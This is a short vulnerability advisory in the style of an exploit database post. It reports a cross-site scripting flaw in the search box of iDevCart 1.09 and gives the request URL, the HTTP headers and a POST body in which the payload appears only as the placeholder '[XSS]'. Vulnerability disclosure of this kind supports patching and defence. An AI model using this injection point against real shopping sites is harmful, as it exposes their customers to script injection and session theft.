______ __ ______
/\ == \ /\ \ /\ __ \
\ \ __< \ \ \ \ \ \/\ \
\ \_____\ \ \_\ \ \_____\
\/_____/ \/_/ \/_____/
01000010 01101001 01001111
[#]----------------------------------------------------------------[#]
#
# [+] iDevCart 1.09 XSS Vulnerability
#
# // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Homepage : www.ssteam.ws
# [x] Thanks: sp1r1t,packetdeath,Zer0flag,redking and ssteam.ws ...
# [x] IRC : irc.freenode.net / #security-shell
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ Usange ]
#
# Go at the iDevCart 1.09 path and at the "Search Box" and type your XSS
#
#
[x]==========================================================================================[x]
http://localhost/[path]/?page=browse&mode=search
// Http Headers
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
// SEND Post
SEARCH=[XSS]
[#]------------------------------------------------------------------------------------------[#]
#EOF